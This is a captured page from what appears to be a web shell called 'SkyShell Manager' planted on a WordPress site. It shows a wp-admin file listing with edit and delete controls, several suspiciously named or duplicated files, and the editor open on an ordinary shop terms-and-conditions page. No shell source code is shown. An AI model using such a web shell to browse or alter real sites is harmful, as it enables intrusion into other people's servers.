📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-ajax.php
5.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: terms.php
<?php session_start(); // Initialize the cart if not already done if (!isset($_SESSION['cart'])) { $_SESSION['cart'] = []; } // Handle "Add to Cart" action if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Handle "Remove from Cart" action if (isset($_POST['remove_from_cart'])) { $product_id = htmlspecialchars($_POST['product_id']); if (isset($_SESSION['cart'][$product_id])) { unset($_SESSION['cart'][$product_id]); } header("Location: " . $_SERVER['REQUEST_URI']); exit; } } // Calculate subtotal, shipping, and taxes $subtotal = 0; $shipping = 0.00; // Fixed shipping fee (you can make this dynamic if needed) $taxes = 0.00; // Taxes can be dynamically calculated if you have rates foreach ($_SESSION['cart'] as $item) { $subtotal += $item['price'] * $item['quantity']; } // Total = subtotal + shipping + taxes $total = $subtotal + $shipping + $taxes; // Calculate the total number of items in the cart $cart_count = 0; if (!empty($_SESSION['cart'])) { foreach ($_SESSION['cart'] as $item) { $cart_count += $item['quantity']; } } // Database connection require 'db_connection.php'; $conn->close(); ?> <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <!-- Document Meta ============================================= --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!--IE Compatibility Meta--> <meta name="author" content="zytheme" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="description" content="ToyTown - Responsive HTML5 Template"> <link rel="icon" href="assets/images/fav1.png" sizes="32x32" type="image/png"> <link rel="stylesheet" href="ajax/libs/material-design-icons/3.0.1/iconfont/material-icons.min.css"> <link rel="stylesheet" href="css/tether.min.css"> <script src="javascript/tether.min.js"></script> <!-- Stylesheets ============================================= --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/owl.carousel.min.css" rel="stylesheet"> <link href="assets/css/theme.css" rel="stylesheet"> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <!-- JavaScripts ============================================= --> <script src="assets/js/jquery.js" type="text/javascript"></script> <script src="assets/js/bootstrap.js" type="text/javascript"></script> <script src="assets/js/owl.carousel.js" type="text/javascript"></script> <script src="assets/js/animate.js" type="text/javascript"></script> <script src="assets/js/totalstorage.js" type="text/javascript"></script> <script src="assets/js/counter.js" type="text/javascript"></script> <script src="assets/js/parallax.js" type="text/javascript"></script> <script src="assets/js/bxslider.js" type="text/javascript"></script> <script src="assets/js/ishi.initialize.js" type="text/javascript"></script> <script src="assets/js/support.js" type="text/javascript"></script> <!-- Document Title ============================================= --> <title>Kids Care Products</title> </head> <body id="product"> <main> <div id="menu_wrapper" class=""></div> <!-- --------------------loader------------ <div id="spin-wrapper"></div> <div id="siteloader"> <div class="loader"></div> </div> <!-- --------------------header------------ --> <header id="header" class="other"> <div class="header-top"> <div class="container"> <div class="row"> <!-- --------------------desktop_logo------------ --> <div id="desktop_logo" class="col-lg-3 col-md-5 col-sm-12 col-xs-12"> <a href="index.php"> <img class="logo img-responsive" src="assets/images/logo1.png" alt="Demo Shop"> </a> </div> <div class="header-top-right offset-xl-2 col-xl-7 col-lg-9 col-md-7 col-sm-12 col-xs-12"> <!-- --------------------services------------ --> <div id="ishiservices" class="ishiservicesblock"> <div class="ishiservices owl-carousel"> <div class="services item"> <a href="#"> <div class="service-img" style="background-image: url(assets/images/services/1.png);"> </div> <div class="service-block"> <div class="service-title">Free Delivery</div> <div class="service-desc">Free delivery is avaible to standard customers</div> </div> </a> </div> <div class="services item"> <a href="#"> <div class="service-img" style="background-image: url(assets/images/services/2.png);"> </div> <div class="service-block"> <div class="service-title">Free Gift Voucher</div> <div class="service-desc">We send gift vouchers to standard customers</div> </div> </a> </div> <div class="services item"> <a href="#"> <div class="service-img" style="background-image: url(assets/images/services/3.png);"> </div> <div class="service-block"> <div class="service-title">Money Back Guarantee</div> <div class="service-desc">You can request an money Guarantee refund</div> </div> </a> </div> <div class="services item"> <a href="#"> <div class="service-img" style="background-image: url(assets/images/services/4.png);"> </div> <div class="service-block"> <div class="service-title">24X7 Support Assistance</div> <div class="service-desc">We provide 24X7 Support to customers</div> </div> </a> </div> </div> </div> </div> </div> </div> </div> <div class="nav-full-width"> <div class="container"> <div class="row"> <!-- ------------------mega menu----------- --> <div id="_desktop_top_menu" class="menu js-top-menu hidden-sm-down"> <ul class="top-menu" id="top-menu" data-depth="0"> <li class="cms-page" id="category-12"> <a class="dropdown-item" href="index.php" data-depth="0"> Home </a> </li> <li class="cms-page" id="cms-page-4"> <a class="dropdown-item" href="new_arrivals.php" data-depth="0"> New Arrivals </a> </li> <li class="cms-page" id="cms-page-4"> <a class="dropdown-item" href="hot_selling.php" data-depth="0"> Hot Selling </a> </li> <li class="category" id="category-3"> <a class="dropdown-item" href="shop.php" data-depth="0">Shop</a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_37079" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="popover sub-menu collapse" id="top_sub_menu_37079"> <ul class="top-menu" data-depth="1"> <li class="category" id="category-4"> <a class="dropdown-item dropdown-submenu" href="boy_collections.php" data-depth="1"> Boys Collections </a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_40183" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="collapse" id="top_sub_menu_40183"> <ul class="top-menu" data-depth="2"> <li class="category" id="category-5"> <a class="dropdown-item" href="boy_sets.php" data-depth="2"> Boy Sets </a> </li> <li class="category" id="category-6"> <a class="dropdown-item" href="boys_tshirts.php" data-depth="2"> Boy T-Shirts </a> </li> <li class="category" id="category-7"> <a class="dropdown-item" href="boys_shirts.php" data-depth="2"> Boy Shirts </a> </li> <li class="category" id="category-7"> <a class="dropdown-item" href="boys_pack.php" data-depth="2"> Boy Pack Of 2 & 3 </a> </li> <li class="category" id="category-7"> <a class="dropdown-item" href="boys_winter_wear.php" data-depth="2"> Boy Winter Wear </a> </li> </ul> </div> </li> <li class="category" id="category-8"> <a class="dropdown-item dropdown-submenu" href="girl_collections.php" data-depth="1"> Girls Collections </a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_71335" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="collapse" id="top_sub_menu_71335"> <ul class="top-menu" data-depth="2"> <li class="category" id="category-9"> <a class="dropdown-item" href="girl_ethnic_wear.php" data-depth="2"> Girl Ethnic Wear </a> </li> <li class="category" id="category-10"> <a class="dropdown-item" href="girl_sets.php" data-depth="2"> Girl Sets </a> </li> <li class="category" id="category-11"> <a class="dropdown-item" href="girl_dresses.php" data-depth="2"> Girl Dresses </a> </li> <li class="category" id="category-11"> <a class="dropdown-item" href="girl_jumpsuit.php" data-depth="2"> Girl Jumpsuit </a> </li> <li class="category" id="category-11"> <a class="dropdown-item" href="girl_winter_wear.php" data-depth="2"> Girl Winter Wear </a> </li> <li class="category" id="category-11"> <a class="dropdown-item" href="girl_others.php" data-depth="2"> Others </a> </li> </ul> </div> </li> <li class="category" id="category-14"> <a class="dropdown-item dropdown-submenu" href="new_arrivals.php" data-depth="1"> New </a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_17740" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="collapse" id="top_sub_menu_17740"> <ul class="top-menu" data-depth="2"> <li class="category" id="category-15"> <a class="dropdown-item" href="new_arrivals.php" data-depth="2"> New Arrivals </a> </li> </ul> </div> </li> </ul> <img class="category-image" src="assets/images/category-dropdown.jpg" alt="category-image" title="Girl"> </div> </li> <li class="category" id="category-13"> <a class="dropdown-item" href="boy_collections.php" data-depth="#0">Boys</a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_43175" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="popover sub-menu collapse" id="top_sub_menu_43175"> <ul class="top-menu" data-depth="1"> <li class="category" id="category-131"> <a class="dropdown-item dropdown-submenu" href="boy_collections.php" data-depth="1"> Boys Collections </a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_127" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="collapse" id="top_sub_menu_127"> <ul class="top-menu" data-depth="2"> <li class="category" id="category-130"> <a class="dropdown-item" href="boy_sets.php" data-depth="2"> Boys Sets </a> </li> <li class="category" id="category-128"> <a class="dropdown-item" href="boys_tshirts.php" data-depth="2"> Boys T-Shirts </a> </li> <li class="category" id="category-129"> <a class="dropdown-item" href="boys_shirts.php" data-depth="2"> Boys Shirts </a> </li> <li class="category" id="category-129"> <a class="dropdown-item" href="boys_pack.php" data-depth="2"> Boys Pack Of 2 & 3 </a> </li> <li class="category" id="category-129"> <a class="dropdown-item" href="boys_winter_wear.php" data-depth="2"> Boys Winter Wear </a> </li> </ul> </div> </li> </ul> </div> </li> <li class="category" id="category-13"> <a class="dropdown-item" href="girl_collections.php" data-depth="0">Girls</a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_431" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="popover sub-menu collapse" id="top_sub_menu_431"> <ul class="top-menu" data-depth="1"> <li class="category" id="category-131"> <a class="dropdown-item dropdown-submenu" href="girl_collections.php" data-depth="1"> Girls Collections </a> <span class="float-xs-right hidden-lg-up"> <span data-target="#top_sub_menu_1277" data-toggle="collapse" class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> <div class="collapse" id="top_sub_menu_1277"> <ul class="top-menu" data-depth="2"> <li class="category" id="category-130"> <a class="dropdown-item" href="girl_ethnic_wear.php" data-depth="2"> Girls Ethnic Wear </a> </li> <li class="category" id="category-130"> <a class="dropdown-item" href="girl_sets.php" data-depth="2"> Girls Sets </a> </li> <li class="category" id="category-128"> <a class="dropdown-item" href="girl_dresses.php" data-depth="2"> Girls Dresses </a> </li> <li class="category" id="category-129"> <a class="dropdown-item" href="girl_jumpsuit.php" data-depth="2"> Girls Jumpsuit </a> </li> <li class="category" id="category-129"> <a class="dropdown-item" href="girl_winter_wear.php" data-depth="2"> Girls Winter Wear </a> </li> <li class="category" id="category-129"> <a class="dropdown-item" href="girl_others.php" data-depth="2"> Others </a> </li> </ul> </div> </li> </ul> </div> </li> </ul> <div class="clearfix"></div> </div> <!-- -------------------shopping cart----------- --> <!-- -------------------headercontact----------- --> <!-- ------------------mobile media--------- --> <div id="menu-icon" class="menu-icon hidden-lg-up"> <i class="fa fa-bars" aria-hidden="true"></i> </div> <div id="_mobile_cart"></div> <div id="_mobile_seach_widget"></div> <div class="clearfix"></div> </div> </div> </div> </header> <!-- -------------------mobile media---------- --> <div id="mobile_top_menu_wrapper" class="hidden-lg-up" style="display:none;"> <div id="top_menu_closer"> <i class="material-icons">?</i> </div> <div class="js-top-menu mobile" id="_mobile_top_menu"></div> </div> <!-- ------------------breadcrumb--------------> <!-- -----------Checkout page----------- --> <section id="wrapper" class="top-wrapper"> <div class="container"> <section id="content"> <div class="row"> <div class="col-lg-8 col-sm-12"> <div class="accordion" id="accordionExample"> <section class="checkout-step card" id="checkout-personal-information-step"> <h2>Terms & Conditions</h2><br /> <p>1. That you will use the services provided by Kidscareproducts.com, its affiliates, consultants and contracted companies, for lawful purposes only and comply with all applicable laws and regulations while using the Site and transacting on the Site.</p><br /> <p>2. You will provide true, accurate, complete and current information in all instances where such information is requested of you. Kidscareproducts.com reserves the right to confirm and validate the information and other details provided by you at any point of time. If upon confirmation your details are found not to be true (wholly or partly), Kidscareproducts.com has the right in its sole discretion to reject the registration and debar you from using the Services of Kidscareproducts.com and / or other affiliated websites without prior intimation whatsoever.</p><br /> <p>3. To compensate Kidscareproducts.com for any extra cost incurred for redelivery in the event of a non-delivery in the first instance on account of a mistake by you (i.e. wrong name or address or any other wrong information).</p><br /> <p>4. That you using your best and prudent judgment before entering into any transaction through this Site doing so at your sole risk.</p><br /> <p><strong>Membership Eligibility</strong></p><br /> <p>Use of the Site is available only to persons who can form legally binding contracts under applicable law. are not eligible to use the Site. If you are a minor i.e. under the age of 18 years but at least 13 years of age you may use this Site only under the supervision of a parent or legal guardian who agrees to be bound by these Terms of Use. If your age is below that of 18 years your parents or legal guardians can transact on behalf of you if they are registered users. You are prohibited from purchasing any material which is for adult consumption the sale or purchase of which to/by minors are strictly prohibited.</p><br /> <p>Kidscareproducts.com reserves the right to terminate your membership and refuse to provide you with access to the Site if Kidscareproducts.com discovers that you are under the age of 18 years. The Site is not available to persons whose membership has been suspended or terminated by Kidscareproducts.com for any reason whatsoever.</p><br /> </section> </div> </div> <div class="col-lg-4 col-sm-12"> </div> </div> </section> </div> </section> <!-- -----------------footer-------------------- --> <footer id="footer"> <div class="footer-container"> <div class="container"> <div class="row"> <!-- -------------------storeinfo---------- --> <div id="ishistoreinfo" class="col-lg-3 col-md-12 col-sm-12 col-xs-12"> <div id="ishistoreinfo-container" class="ishistoreinfo-inner"> <a href="index.php" class="store-logo"> <img src="assets/images/logo1.png" alt="footer-logo"> </a> <div class="store-description"> <p>At KidsCare Products, we understand that your child's safety, comfort, and happiness come first. That's why we offer a carefully curated range of every item is handpicked to ensure quality, durability, and peace of mind for parents.</p> </div> </div> </div> <div id="_mobile_storeinfo" class="block-contact col-md-12 col-sm-12 col-xs-12 footer-block"></div> <!-- -------------------myaccount---------- --> <div class="col-lg-3 col-md-12 col-sm-12 col-xs-12 links wrapper footer-block"> <h3 class="h3 title_block hidden-md-down">Info</h3> <div class="footer-title clearfix hidden-lg-up collapsed" data-target="#footer_account_list" data-toggle="collapse"> <span class="h3">Info</span> <span class="float-xs-right"> <span class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </span> </div> <ul id="footer_account_list" class="footer-dropdown collapse"> <li> <a class="cms-page-link" href="contact.php"> Contact Us </a> </li> <li> <a class="cms-page-link" href="privacy.php"> Privacy Policy </a> </li> <li> <a class="cms-page-link" href="terms.php"> Terms & Condition </a> </li> <li> <a class="cms-page-link" href="unsubscribe.php"> Unsubscribe Newsletter </a> </li> </ul> </div> <!-- -------------------linklist---------- --> <div class="col-lg-3 col-md-12 col-sm-12 col-xs-12 links wrapper footer-block"> <h3 class="h3 title_block hidden-md-down">Product</h3> <div class="footer-title clearfix hidden-lg-up collapsed" data-target="#footer_sub_menu_83280" data-toggle="collapse"> <span class="h3 title_block">Product</span> <span class="navbar-toggler collapse-icons"> <i class="material-icons add">?</i> <i class="material-icons remove">?</i> </span> </div> <ul id="footer_sub_menu_83280" class="footer-dropdown collapse"> <li> <a class="cms-page-link" href="new_arrivals.php"> New Arrivals </a> </li> <li> <a class="cms-page-link" href="hot_selling.php"> Hot Selling </a> </li> <li> <a class="cms-page-link" href="shop.php"> Shop </a> </li> <li> <a class="cms-page-link" href="boy_collections.php"> Boy Collections </a> </li> <li> <a class="cms-page-link" href="girl_collections.php"> Girl Collections </a> </li> </ul> </div> <!-- -------------------contactblock ---------- --> <div id="_desktop_storeinfo" class="block-contact col-lg-3 col-md-12 col-sm-12 col-xs-12 footer-block"> <h3 class="h3 title_block hidden-md-down">Store information</h3> <div id="contact-info-container" class="footer-contact"> <div class="block address col-lg-12 col-md-4 col-sm-4 col-xs-12"> <div class="content">No 23, KEB Colony,<br> Industrial Area, Hoodi,<br> Bengaluru, Karnataka 560048.</div> </div> <div class="block email col-lg-12 col-md-4 col-sm-4 col-xs-12"> <div class="content"> <a href="#">contact@kidscareproducts.com</a> </div> </div> </div> </div> </div> </div> </div> <div class="footer-after"> <div class="container"> <div class="row"> <div class="col-lg-6 col-xs-12"> <!-- -------------------copyrights---------- --> <p class="footer-aftertext"> <a class="_blank" href="#" target="_blank"> Copyright 2025 KidsCare Products. All Rights Reserved. </a> </p> </div> </div> </div> </div> <a id="slidetop" href="#" ></a> </footer> </main> </body> </html>
Save